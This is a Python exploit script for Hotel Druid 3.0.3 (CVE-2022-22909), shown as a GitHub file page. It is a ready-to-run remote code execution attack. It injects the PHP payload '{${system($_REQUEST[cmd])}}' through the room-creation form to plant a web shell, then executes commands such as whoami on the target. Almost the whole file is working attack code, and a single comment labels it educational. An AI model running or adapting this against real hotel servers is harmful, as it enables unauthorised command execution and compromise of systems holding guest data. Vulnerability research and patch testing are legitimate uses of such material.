-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathHotelDruidExploit.py
95 lines (70 loc) · 2.16 KB
/
HotelDruidExploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/python
import requests
import re
import argparse
# Title : Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Author : kaal
# Github : https://github.com/kaal18
# HackTheBox : https://app.hackthebox.com/profile/248660
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
db = None
#URL = "http://127.0.0.1/hoteldruid"
URL = None
def getDb():
url = URL + "/inizio.php"
r = requests.get(url)
db = str(r.content).split('<a class=\"nav\" id=\"nb_men\" href=\"./inizio.php?')[1].split('=')[1].split('"')[0]
db = str(db)
return db
def already_exploited():
url = URL + "/visualizza_tabelle.php"
params = {'anno':db,'tipo_tabella':'appartamenti'}
r = requests.get(url,params=params)
payload = "{${system($_REQUEST[cmd])}}"
# Regex match , Education purpose only
pa = "\{\$\{system\(\$\_REQUEST\[cmd\]\)\}\}"
reg = re.search(pa,r.text)
#print(reg)
if payload in r.text:
print("Already Exploitd , Please visit below URL.")
print(URL+"/dati/selectappartamenti.php?cmd=whoami")
exit()
else :
print("Exploiting ")
pass
def newroom():
db = getDb()
url = URL + "/visualizza_tabelle.php"
# n_app = 1337 is create new room nm.
data = {'anno':db,'tipo_tabella':'appartamenti','crea_app':1,'n_app':"{${system($_REQUEST[cmd])}}"}
headers = {}
r = requests.post(url,data=data)
data = {'anno':db,'n_app':"{${system($_REQUEST[cmd])}}",'crea_app':'SI','tipo_tabella':'appartamenti'}
r = requests.post(url,data=data)
if r.ok:
print("Room is added With payload . .")
else :
print("Sory room can't be added")
exit()
def exploit():
shell = 'whoami'
url = URL + "/dati/selectappartamenti.php"
params = {'cmd':shell}
r = requests.get(url,params=params)
print("status Code : ",r.status_code)
print(r.text)
print("Exploitation url : " ,r.url)
# Parsing Arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url',type=str,dest='URL',help="Provide URL Ex. http://127.0.0.1/hoteldruid ")
args = parser.parse_args()
print("You entered : ",args.URL)
URL = args.URL
def main():
already_exploited()
newroom()
exploit()
main()